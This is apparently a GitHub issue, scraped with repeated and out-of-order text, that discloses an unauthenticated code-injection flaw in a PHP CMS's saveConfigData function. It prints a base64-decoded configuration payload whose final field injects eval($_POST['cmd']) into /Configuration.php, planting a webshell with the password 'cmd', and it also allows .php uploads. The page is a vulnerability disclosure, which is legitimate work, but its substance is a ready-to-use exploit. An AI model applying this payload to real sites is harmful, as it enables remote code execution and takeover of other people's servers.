You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
after base64decode is {"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
we can code inject into the last line, and the final result is our shellcode injected to the /Configuration.php
The text was updated successfully, but these errors were encountered:
An Unauthorized attacker can execute arbitrary php code via
/classes/ajax/Functions.php
,saveConfigData
functionpoc
then
![image](https://user-images.githubusercontent.com/38547290/154812136-8c78218f-51a0-4a53-957e-84606a2ba0c0.png)
/Configuration.php
is your webshell password iscmd
analysis
when parameter file is
after base64decode is
![image](https://user-images.githubusercontent.com/38547290/154812329-c3a50393-41d5-4c43-996a-85d655ffd43f.png)
{"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
we can code inject into the last line, and the final result is our shellcode injected to the
/Configuration.php
The text was updated successfully, but these errors were encountered: